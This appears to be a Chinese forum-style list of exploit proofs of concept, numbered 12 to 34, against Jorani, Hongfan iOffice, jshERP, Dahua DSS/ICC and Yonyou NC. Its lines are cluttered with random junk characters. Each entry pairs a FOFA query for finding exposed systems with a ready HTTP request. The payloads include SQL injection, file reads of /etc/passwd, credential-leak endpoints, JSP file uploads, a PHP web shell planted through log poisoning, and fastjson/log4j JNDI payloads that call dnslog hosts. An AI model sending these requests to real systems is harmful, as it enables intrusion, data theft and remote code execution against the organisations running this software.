+ \; B( q1 Z C% [4 {3 }GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
$ x, \ E. _% D; B5 |( X8 L3 w- jHost: 127.0.0.11 K( a& U, r0 b" O: P! y: V& i
Pragma: no-cache3 K' q4 L3 j' ?1 g/ K
Cache-Control: no-cache
# a9 E4 L6 J( UUpgrade-Insecure-Requests: 1
0 y3 o& o8 I; Z4 ]% n7 _4 `* L0 C9 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
! t, j6 h# c4 V8 U( u: N. Y4 J( UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 T4 n6 ]6 [# S. b2 fAccept-Encoding: gzip, deflate" q- t& B x/ S( c7 Z' O9 m* [) Y
Accept-Language: zh-CN,zh;q=0.9,en;q=0.81 {7 `% h7 j0 m4 f
Connection: close
8 M* N5 t. H2 H. Z; o' x: B$ D" C
4 t/ D' j; ~+ M1 a: ~- {7 |( Z6 K2 q
12. Jorani < 1.0.2 远程命令执行
* l! n W1 t5 g7 a( fFOFA:title="Jorani"
) s1 m J0 l* c% |& M第一步先拿到cookie
0 Z; h* m$ C8 \: j( |" {GET /session/login HTTP/1.1! I# m: s' }* G
Host: 192.168.190.306 O. p# K ]. Q7 e6 _
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36, u" {$ m. q% s! k! ]
Connection: close
# r# G! `. b6 X9 X; sAccept-Encoding: gzip, h' \4 X6 O9 H& M. G
' x+ L. \4 p! u% |: F& H
" _1 Y) l1 F% q# k- U) O
响应中csrf_cookie_jorani用于后续请求5 k3 \, e" L- x( a, U9 i% x
HTTP/1.1 200 OK
6 ]3 d: R& _# T- `Connection: close6 P" N$ Q( i7 T' C+ X' J+ R: J
Cache-Control: no-store, no-cache, must-revalidate
/ |+ B/ |4 W6 AContent-Type: text/html; charset=UTF-84 d' U! c0 |+ u% g/ v
Date: Tue, 24 Oct 2023 09:34:28 GMT& F( r, j# B# M0 @# T( f: C4 i- {
Expires: Thu, 19 Nov 1981 08:52:00 GMT) D/ x$ F$ S2 G, J$ A0 J U
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
7 L- U3 \3 D WPragma: no-cache
, Y6 A$ C6 \" r. IServer: Apache/2.4.54 (Debian)
- a* A' t+ H7 }. }! CSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
- Y: A" _) e9 oSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly' v5 ^" x e9 w4 x. g" ^
Vary: Accept-Encoding
* V, T( m! Q+ t* i: x- z
7 i6 y7 M: A$ X5 G+ Z9 i! { `" E' y" w) F
POST请求,执行函数并进行base64编码( t& b% {, O( E: C$ N
POST /session/login HTTP/1.1
' p, \$ y( L6 t$ D$ @: ]% RHost: 192.168.190.30/ ~ f% I2 v) N: E- g0 M' f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36* ^% E+ F& E7 p8 V9 g# V: [: T: |
Connection: close5 a$ Q* X+ n8 ?" W
Content-Length: 252
2 K3 |5 ~$ A+ t7 k# r) D0 mContent-Type: application/x-www-form-urlencoded0 G" j' S9 [# `4 J# ~' n6 s$ c
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r' @' Z4 R6 C b5 b# o1 s
Accept-Encoding: gzip) g( _3 Y7 q j# q
- q! t2 s0 O+ M3 f& Q7 |$ Ycsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
; @# s4 i; a' |
( `( k- z4 ^$ z& l" {
- U( r$ S" w! x* d; h- w0 N4 T0 [- J: r
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
5 d, c5 U, \5 dGET /pages/view/log-2023-10-24 HTTP/1.1
& \) j( `- X# F. B) [! RHost: 192.168.190.300 u7 O& Z$ l5 y# J2 e- g) O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36/ M/ D/ s; [' J- D+ E; O1 K2 Z, w
Connection: close. A# u- x( L% v/ \
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
% ^/ d+ x U. d0 j( S" m$ PK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
" ?* u' K$ K! dX-REQUESTED-WITH: XMLHttpRequest
! {' A* O. ^! R* x% i+ RAccept-Encoding: gzip! ?4 b; T7 p, N0 _# K: z' E+ p, I
: K7 `6 B) V3 a8 i
8 }$ H. J/ ~2 e9 o# U& V9 b13. 红帆iOffice ioFileDown任意文件读取% Q* G7 a' o) |: I
FOFA:app="红帆-ioffice"' ^, M0 E4 u4 V' g9 z
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1& Q& i! U# v- V$ `0 W+ S
Host: x.x.x.x* n- k1 y8 S6 e; b+ @1 m, w1 z- E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36# c' B) ?! y! m6 ^
Connection: close3 Z5 A6 x& E7 V, w; B2 E
Accept: */*, w- Q; o/ U" W' P
Accept-Encoding: gzip6 `2 o: h# K+ j) I
. p# n! R$ W& f
: l3 ^" E+ S; B$ K0 K2 P6 D
14. 华夏ERP(jshERP)敏感信息泄露
- c3 Y/ j. E/ N7 mFOFA:body="jshERP-boot"
) v$ |% _5 H- v, @1 k. A泄露内容包括用户名密码. e" E- e! y1 }0 D5 O
GET /jshERP-boot/user/getAllList;.ico HTTP/1.17 U0 @+ N2 R9 {" c7 U9 ]+ F4 P
Host: x.x.x.x0 `2 }" H6 P9 y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.369 N/ J0 D8 Z9 y! x) c
Connection: close
3 G: p# D# g/ L- O6 g: u6 M1 P$ YAccept: */*4 ?$ @9 x6 `% }9 k' ^; {4 m
Accept-Language: en( v- ^ j% E+ i. {9 r7 t% x
Accept-Encoding: gzip
& C" t o/ q# ~' Z9 u& ~% h
) ~0 L' \3 t% o$ H8 v+ r! V. T2 {5 | B$ W3 C" w
15. 华夏ERP getAllList信息泄露
6 a5 a1 X, O8 s/ ]% ?& ^CVE-2024-0490
! N6 L& W* m' C. I( KFOFA:body="jshERP-boot"
( ?6 l; G* w! r* Y泄露内容包括用户名密码/ ] J2 j& q0 v
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.10 b8 M5 P8 W x, T" Z& \( u/ \
Host: 192.168.40.130:100
Z/ z% H4 d# n9 FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
# w% n2 A8 ^0 J+ A+ oConnection: close: v" S7 _; i3 @
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8% E' ?+ @" h ^
Accept-Language: en' x7 k+ t, _6 a% K, S9 \3 y
sec-ch-ua-platform: Windows
# F' d- w) j; ~9 F* }9 |Accept-Encoding: gzip
$ u1 P9 t' J8 f( M0 S
* O# R9 K( ^1 t+ {- u1 W' Q' [5 D9 h* F2 m8 X+ h" Y
16. 红帆HFOffice医微云SQL注入1 Y$ U% B' B9 s0 S* _
FOFA:title="HFOffice"
f) t4 ^& `$ s" g0 O! o" ^poc中调用函数计算1234的md5值
" [/ n& w6 @' Z M9 L, `GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
, ?" k3 h( a- M" J1 l; ~/ a7 OHost: x.x.x.x5 ~7 \: [+ |+ X% T3 T5 q
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.362 G8 I6 U2 L) ~- i. V# E1 C2 ^8 F6 p
Connection: close
) \* W' e& |4 \Accept: */*
1 S3 K+ G/ V3 h' p! _/ W, m' bAccept-Language: en% X6 t$ I* Z( u
Accept-Encoding: gzip
, F! ~: a3 t- d
! ~7 l% m2 p$ O0 f2 ^. r% A+ b
3 F- T. k6 Q, E( }7 [2 r5 y17. 大华 DSS itcBulletin SQL 注入6 Z! ?+ g' N8 x, `! P* W+ m4 H1 ~! c$ O, D
FOFA:app="dahua-DSS"/ T. y+ I# @6 k, ^
POST /portal/services/itcBulletin?wsdl HTTP/1.1
6 e' p1 k0 ?: }7 YHost: x.x.x.x6 X: K \3 U: c% R2 {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 ^1 R0 Z- I' G+ Y$ p7 g
Connection: close9 v8 A" E' J' I: x" t `+ I
Content-Length: 345
1 j7 p) ?# I! L! ^Accept-Encoding: gzip
T0 q: \4 s2 `' x
6 i' n7 l" O+ Z$ N* x0 a<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>) S6 P5 @& W( R9 p
<s11:Body>
; b/ O( k( p6 d7 r2 w4 q. k <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>1 Z- H3 q- e3 F& r; Z2 a
<netMarkings>; c5 J6 G5 V4 g& K+ `, Z
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=16 X6 O H* `7 W
</netMarkings># D5 z1 K4 [: Y9 s# ?2 Q8 P+ i- v- V7 \
</ns1:deleteBulletin>$ G) A3 H) N. _
</s11:Body>
4 g. N! [# a' y* O* ^2 e: E8 m7 {</s11:Envelope>& o Z# |1 U! ]/ S9 i. z
0 o) G9 J- z) I4 Z3 p1 {* s9 T0 v7 M! u# A) n9 c6 [
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露4 Z! J1 e$ p) u* ~( p
FOFA:app="dahua-DSS"
' v7 p( p$ @2 ~4 X4 NGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
: J( C! o, C+ ^0 z* s: yHost: your-ip
1 W+ A# K5 N: N! ]/ N5 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ ^6 S9 j. [, u" E( {. x) ]Accept-Encoding: gzip, deflate) j: n# M* A0 `1 _9 r) b! S
Accept: */*2 T* E' n2 e. y
Connection: keep-alive5 j7 K$ G7 f5 a$ o
5 A) X, P$ c5 y' A/ R( M: a4 q
* g8 C9 K0 e+ x8 C5 i# O" }, h! x4 P! S
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入4 q" x- c2 T& }7 ~; \4 V6 q$ |6 h1 P
FOFA:app="dahua-DSS"+ w9 D( Q1 o6 G4 X: @- u4 d9 E
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
* m+ g; {( X' k+ B( s: p$ MHost:0 V1 U5 r7 n. \% Q! u9 P4 l7 ]
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.368 r6 K2 n1 `, R! |# [
Accept-Encoding: gzip, deflate
9 U u8 E/ |# _2 \0 xAccept: */*
4 M4 ^7 x9 n! t8 K8 {! }* {; nConnection: keep-alive
. F7 C" ]; b. \1 V' x
8 w4 {! r, W7 T$ l5 h2 A# t6 |, f, ~) ?9 v0 V
20. 大华ICC智能物联综合管理平台任意文件读取9 _9 p8 P B( K0 |( |( P2 i
FOFA:body="*客户端会小于800*"
3 O$ E" a* o2 k3 G9 c2 R( N2 sGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
* p: q* p d8 G. b: X8 ]Host: x.x.x.x
8 X, C2 w/ p( ]$ E7 mUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.363 v- a7 j6 y' y" o+ X/ C1 Z8 g0 J3 ?
Connection: close
' z6 H" M9 V! q* T0 Q+ T ]( rAccept: */*2 ?6 F ?5 i6 x( u; N/ m
Accept-Language: en
% N$ [$ l8 Q4 w" o g% E, XAccept-Encoding: gzip, h0 ~6 Q/ X8 s! Q4 A
5 K2 i! L. Z' K0 D9 j0 z2 t
) @) B5 O) k; d% U3 q# i/ D3 Q21. 大华ICC智能物联综合管理平台random远程代码执行
* u; ^; O8 p1 v |+ @/ R6 D$ FFOFA:icon_hash="-1935899595"- h8 Q Z2 [2 ~
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1: X1 U0 n! }4 L2 G, q' C
Host: x.x.x.x3 T7 }! W8 t& @% W) }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 M, `4 K: p: e4 F6 t; J" K5 UContent-Length: 161
+ z$ q, o+ E1 @4 o3 \9 j, V6 KAccept-Encoding: gzip
& ?; R4 F2 _! R# c! K$ WConnection: close
. ]; I5 M+ l7 q' z6 C+ G2 O6 O, QContent-Type: application/json;charset=utf-8
7 x8 o- G" {+ \! b, C. K( X( D
" c9 G( n; p3 k, j5 u5 h$ b{$ j* [* n# c$ c" ?- R
"a":{
7 y2 }7 F5 f9 k# X3 K0 I "@type":"com.alibaba.fastjson.JSONObject",
, b/ R/ _/ ?+ k3 e6 D7 ]1 ? {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
, S$ [) D& W- _/ e1 `) S- a }""1 i, l$ s7 p# z1 L' V
}/ z, p% D! M; j
& V' ]' @$ e* e* X# F' X; _
9 J2 P3 |6 r8 N8 q/ v; P22. 大华ICC智能物联综合管理平台 log4j远程代码执行' ~; w0 @% b# ^# {$ r2 [4 ?1 }
FOFA:icon_hash="-1935899595"" J+ ?% L# f: R o! [
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
% g1 V$ Q6 u, a% u3 L qHost: your-ip7 k3 j& _& {; g; U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.364 V9 U" |& h- z/ f; E
Content-Type: application/json;charset=utf-8
- [$ |. @; h$ O7 |( ?7 `8 U: {: t8 ~8 k8 R% M9 M2 {9 p/ L
{* W# h+ S R- r" f
"loginName":"${jndi:ldap://dnslog}"2 H% S' U6 X2 j% d8 F* U
}& J0 E4 E2 [6 `
7 @% U& {: p ?% |& [/ F+ e
8 i( B4 d/ a6 v' E& [7 G$ J5 T8 A' Q; E* d; x* O; s
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
( ?: j: C7 F* b1 G: f4 J8 IFOFA:icon_hash="-1935899595"' d, r. c# D: ]
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.17 w2 l' N) F- R1 Q
Host: your-ip
p, H0 ?& `5 a5 m9 n2 l8 y& B+ r. cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ m, k0 x6 {+ s2 N. q A
Content-Type: application/json;charset=utf-8
+ O$ |% L, D* x# uAccept-Encoding: gzip
2 Y; s; q/ M% p1 Y1 ~) F. FConnection: close9 T) @" o, Q. s# e1 d9 V1 p
9 H# X8 f3 W1 ^2 a4 u5 G' o{# L4 }4 {4 I" G/ _) z
"a":{
& ~$ o7 V: e0 ] "@type":"com.alibaba.fastjson.JSONObject",
% L0 l, `5 ~1 W: A9 Q {"@type":"java.net.URL","val":"http://DNSLOG"}6 ]0 ?# N0 ]; N4 X3 w- n, r. @
}"". q* c) Z+ J6 m$ y
}
8 m+ R2 @- U) R* t$ i8 H
$ o) L' I+ a# |1 W, _' n
N% C/ i8 h! h z: }0 n24. 用友NC 6.5 accept.jsp任意文件上传3 ]9 L9 a0 F% e& Q1 d+ t
FOFA:icon_hash="1085941792"
; A9 x1 x: d$ [' g; s1 IPOST /aim/equipmap/accept.jsp HTTP/1.1
( N, C% n1 w% ^1 g; kHost: x.x.x.x
& i9 k* R# w7 {4 ~' VUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36# S/ K2 E9 p7 P+ V+ E' S
Connection: close6 m+ _ v H. g8 M$ `8 I
Content-Length: 449* s+ Y$ L# o; Y! W; Y: ?( m
Accept: */*( z" }. D! x! r* l l4 c4 p2 @
Accept-Encoding: gzip
1 g8 q2 V8 ~/ e+ f2 P, [Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
: X6 j# z! y- s1 @" ?5 P
2 {5 j' m2 q, V M9 O-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc5 m* A# Z: p& F+ e$ o# k
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"0 m9 q6 q) [0 P r1 Q
Content-Type: text/plain+ T6 O+ ?9 n& @1 u3 g! h
" K" w2 I- T% R; [7 k" u- [
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
6 W" r3 i6 T/ l0 ^/ q-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
% u9 g* T( V6 ZContent-Disposition: form-data; name="fname"
6 C Q$ Z) p. I4 h: j
5 k3 ` ~* r& z, D2 O9 {, k\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
9 O3 I) h. [, o-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
: P9 l% g Z( y
8 i4 e; N6 l0 L( x- f# c; I J3 \- G4 {% d
25. 用友NC registerServlet JNDI 远程代码执行
% x( W9 W1 n4 X; OFOFA:app="用友-UFIDA-NC"
0 p' X# H6 Z+ G, d) _6 cPOST /portal/registerServlet HTTP/1.1
9 D1 T" X$ L3 z4 s6 Q% AHost: your-ip
2 ^8 ] ?) x+ bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
- l# ?+ u$ T! ?% OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
3 ?5 g, Y5 H' q7 N6 H, x$ n- rAccept-Encoding: gzip, deflate
, W7 E# Z# w8 ]3 Y7 T$ T2 _: i0 aAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
( L4 R( X0 \+ V1 h- r2 `Content-Type: application/x-www-form-urlencoded
4 {. j' V1 q0 U# Z c9 Y$ M1 Y( K6 m/ {2 h$ Q. ~8 K
type=1&dsname=ldap://dnslog
6 n4 _ V$ g& y! ]: ~$ K, | `3 K
: Z7 I0 f0 \- E/ V
6 P4 l8 M1 |. A8 b% @% x: B- o5 G% q# m9 V4 k6 J8 {
26. 用友NC linkVoucher SQL注入% Q7 X0 K1 V1 F6 j8 b. A
FOFA:app="用友-UFIDA-NC"( z" f3 ^. Z* Z0 ~7 T$ ~; U
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.14 m% p) [" L9 ?" v& y" Q
Host: your-ip: W* H0 B8 L/ B, f. s0 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( ~0 ?, P# r& v Y) g. |
Content-Type: application/x-www-form-urlencoded7 q! Q! c2 F# o$ H, U+ U* y
Accept-Encoding: gzip, deflate
* T$ S) P# t, c. Q$ ~3 x" T. S* jAccept: */*
5 f$ w: C7 D! V7 f8 l) `Connection: keep-alive
0 O; Z5 H5 @, m; r) y H, a3 v. m0 ~& `$ s& s, z
# q& V4 F; A! A& s
27. 用友 NC showcontent SQL注入
, ^2 B% B0 l b: }FOFA:icon_hash="1085941792"
4 N" h9 p4 w% y/ V( a5 U* }( p, oGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
2 V) q. N2 w. _ zHost: your-ip. F0 ]& R2 l% m) ~0 ~ Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( n5 a6 Q$ V' ~4 u0 k$ h# p. nAccept-Encoding: identity
: E' C% |, R3 w1 w7 g) T% GConnection: close
# I: \9 R8 V5 c2 q+ ~* `Content-Type: text/xml; charset=utf-8
1 ?8 s# M4 q8 R2 z0 ^: ]4 m
; d1 t* a$ W0 v8 l. c3 J; m( N2 a
) a/ ~' k1 D& z4 z4 E4 X, e- T28. 用友NC grouptemplet 任意文件上传- _1 [0 ] Z7 B
FOFA:icon_hash="1085941792"
- B7 y7 f" l0 I, l6 H1 `* n% x$ qPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
& q7 k1 c; q8 I; u* C; ^5 ?% SHost: x.x.x.x2 K& F7 ~8 Q4 z, m" ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36* b& `. U2 \- n8 l: K( \
Connection: close( M1 `" I {7 B8 O+ l
Content-Length: 268$ [7 o- z" G, g
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
) ~5 ^) v/ W) IAccept-Encoding: gzip! \" P" J1 Z g7 K3 r' r: x' @7 L
. X$ { B5 r' x6 j------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
+ |! |) Z/ m9 h) E- |! L; A, zContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
* X2 n: n/ \1 Y3 NContent-Type: application/octet-stream
3 L- O$ D3 v/ c
8 }0 f8 q: E) N$ w) s- B) p# a# @<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
% j- g- Y6 i( ]- J7 x* M5 J------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
% h! X# d3 k' N* L" I2 X2 ]) ]! @4 z2 j' H" u
) Q4 c2 T7 Q9 @1 K% f9 z
/uapim/static/pages/nc/head.jsp7 {: u2 f+ ~0 q5 q" v" V
" r/ b' o8 X+ x* `1 h/ u$ I29. 用友NC down/bill SQL注入$ \3 J; R9 |* k& j, c5 l
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"2 c/ \- W7 G9 K, v2 J4 o, s- l
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1/ H: |9 k* ?9 W; [
Host: your-ip7 P: ~" v% p6 v4 D$ N3 S* m4 c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ v# y' j0 M1 p
Content-Type: application/x-www-form-urlencoded* l& v5 v S! W! `' L! ]% S
Accept-Encoding: gzip, deflate i. {, |% p y
Accept: */*, R K! C* t* [& g) I
Connection: keep-alive
' i4 m9 N; U$ d1 _4 }$ ]9 D9 ?0 K7 R* X: H, w% Q% b
: C& e$ t, Z3 {$ q' h+ b30. 用友NC importPml SQL注入2 |; n; [; K, B2 J& G4 m# Z6 f6 H8 g0 W
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"3 Q! b. K* a9 f9 g' L; c. }
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.18 }! l2 P: r# l3 X% e
Host: your-ip
4 | I5 ^ T2 `' kContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
, T# V- Y$ A, h0 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36: Y6 t, M4 m0 {0 y6 K: j0 V- \
Connection: close
* {6 \$ M" e+ w. E
# `. Z' G; X1 a$ H------WebKitFormBoundaryH970hbttBhoCyj9V' o- ?$ A9 o( j& w! M- i- L
Content-Disposition: form-data; name="Filedata"; filename="1.jpg". S5 Z0 r( G" Y ^! E7 O6 m
Content-Type: image/jpeg, G3 l0 |) C6 j+ [9 {. q3 d
------WebKitFormBoundaryH970hbttBhoCyj9V--
l H" }1 K! K; ]8 r* \) W4 F |2 p( x$ p7 N
# f7 \2 I* E: v: \! V7 b9 P _" Z5 ]31. 用友NC runStateServlet SQL注入
/ m) |* F8 R1 l5 H+ s4 r$ gversion<=6.5- P: g# N9 @% g7 N6 V
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
' Q" e$ V9 ^' D5 U; L. i4 ]. gGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
6 {$ r1 d4 u5 {% UHost: host9 n: f6 I. d8 F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36& ~& o0 @( J$ d6 A
Content-Type: application/x-www-form-urlencoded
+ V) }7 r7 t6 N( t% |1 q4 e
. M5 L" a- x8 I- i& {( p8 V& J7 M# b! G% W Q
32. 用友NC complainbilldetail SQL注入; H# z/ [: P3 B5 _4 y8 ^) S
version= NC633、NC65, v4 I7 o8 Y2 b; M, j3 V2 W
FOFA:app="用友-UFIDA-NC"( y: `: j$ T, o" Q; A& Q
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
1 ^/ s1 H3 L$ K4 G% y4 Q0 g1 nHost: your-ip* g! ]/ U5 R) C& k2 t9 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 o Q2 H* {; x# D4 C$ G
Content-Type: application/x-www-form-urlencoded
- z/ N% r s4 m6 }( C/ I ^Accept-Encoding: gzip, deflate
3 U6 N8 f- K1 Z1 T1 ]" jAccept: */*2 z' C' s0 I' ]! z) [
Connection: keep-alive
' I9 B4 i2 E6 l P$ n5 S9 P. ^/ K( F6 v4 ^ h+ D
; a; G7 f; l; A# S33. 用友NC downTax/download SQL注入
[+ ?9 b& B' S! w' oversion:NC6.5FOFA:app="用友-UFIDA-NC"! d2 r: K7 n" L; T; a0 ]
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.16 G0 c a* }. }7 E/ }
Host: your-ip: o {( ~: g# p& h$ `9 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ ^# k6 k* D# y3 m! Z* z9 f aContent-Type: application/x-www-form-urlencoded# x1 {% U! [0 C" x2 t; S
Accept-Encoding: gzip, deflate
$ Q3 c t1 j7 d" |* x8 r6 @Accept: */* ~ C# {$ T" t% W# j( h
Connection: keep-alive
3 Y! M& x9 u: {% a4 w% H# v- f6 |
3 R1 L3 t" S) i- A! O. _3 H I
5 W# m, A/ i! T& a34. 用友NC warningDetailInfo接口SQL注入
0 J( C4 K& G5 }FOFA:app="用友-UFIDA-NC"9 Z0 J k( U; r8 L' v8 z
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.15 a* \# S L4 P7 p
Host: your-ip, n6 ?9 M- [) E. J) U3 J `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 U/ [; I3 o- } c
Content-Type: application/x-www-form-urlencoded5 c6 ~; V3 {7 `
Accept-Encoding: gzip, deflate
& i2 G) [4 N4 j1 m- gAccept: */*
( h1 N* }8 ]0 I" m A+ \0 gConnection: keep-alive
& W& P, h O* [
